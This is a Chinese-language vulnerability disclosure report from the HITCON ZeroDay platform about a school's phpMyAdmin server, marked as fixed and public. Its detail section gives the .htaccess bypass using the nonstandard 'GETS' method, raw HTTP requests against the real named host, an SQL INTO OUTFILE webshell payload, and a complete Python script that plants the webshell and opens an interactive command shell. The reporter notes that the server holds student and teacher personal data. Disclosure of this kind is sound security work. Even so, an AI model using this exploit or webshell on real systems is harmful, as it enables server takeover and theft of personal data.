Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00213
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 國立宜蘭高級中學 存在 sql injection 到 RCE
- Introduction: phpmyadmin 權限問題 導致可以查詢 sql 資訊 進而導致 RCE
處理狀態
目前狀態
公開
Last Update : 2021/05/01
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2021/04/21 21:34:47 : 新提交 (由 entroy 更新此狀態)
- 2021/04/21 23:12:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/04/23 13:58:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/04/23 13:58:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/04/27 11:21:40 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/04/27 11:35:29 : 確認已修補 (由 entroy 更新此狀態)
- 2021/05/01 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00213
- 通報者:entroy (entroy)
- 風險:高
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://xms.ylsh.ilc.edu.tw/
敘述
phpmyadmin 用 .htaccess 作防禦
用其中 limit 以外的 method 就可以繞過,我用的 method 是 GETS
.htaccess
AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>之後發現沒有做好權限管控,所以直接是 root@localhost 的權限
直接用
select "<?php phpinfo();?>" INTO OUTFILE "c:\\路徑\\shell.php"發現沒有權限寫入,得到以下資訊
Access denied for user 'root'@'localhost'參考 https://stackoverflow.com/questions/17975120/access-denied-for-user-rootlocalhost-using-password-yes-no-privileges
發現 user root 缺少了 authentication_string,所以直接新增 column 以及 data,我是用 burp 送的
新增 column:
GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=ALTER+TABLE+user+add+COLUMN+authentication_string+VARCHAR(15)
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
寫入 data:
UPDATE user SET authentication_string=password('password') WHERE user='root'重整:
FLUSH PRIVILEGES;之後就可以寫入了
GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C4eff2c041976ea22afb7092a53188c70.php%22
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
完整的 python script:
import requests
import subprocess
import time
import hashlib
import sys
import os
def getCommandResult(command):
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, close_fds=True)
_, _ = p.communicate()
def get_filename():
m = hashlib.md5()
data = str(time.time())
m.update(data.encode('utf-8'))
h = m.hexdigest()
return str(h)
def upload_webshell():
filename = get_filename()
getCommandResult('''curl -X GETS 'http://xms.ylsh.ilc.edu.tw/phpmyadmin/sql.php/?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C{}.php%22' -v'''.format(filename))
time.sleep(1)
if requests.get('http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)).status_code != 200:
return False
return filename
def webshell(filename):
print('q or ctrl^c to quit')
print('=========================== webshell ===========================')
url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
while True:
cmd = input()
if cmd == 'q':
break
data = {
'cmd': cmd
}
result = requests.post(url, data=data)
result.encoding = 'big5'
print(result.text)
def del_webshell(filename):
print('deleting webshell ... ')
url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
cmd = 'del {}.php /f'.format(filename)
data = {
'cmd': cmd
}
requests.post(url, data=data)
def main():
print('Uploading webshell ... ')
filename = upload_webshell()
try:
if (not filename):
print('Upload webshell failed ... ')
exit()
webshell(filename)
del_webshell(filename)
except KeyboardInterrupt:
print('Interrupted')
try:
del_webshell(filename)
except SystemExit:
os._exit(0)
if __name__ == "__main__":
main()進去之後發現有學生老師的個資以及成績相關的資料
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。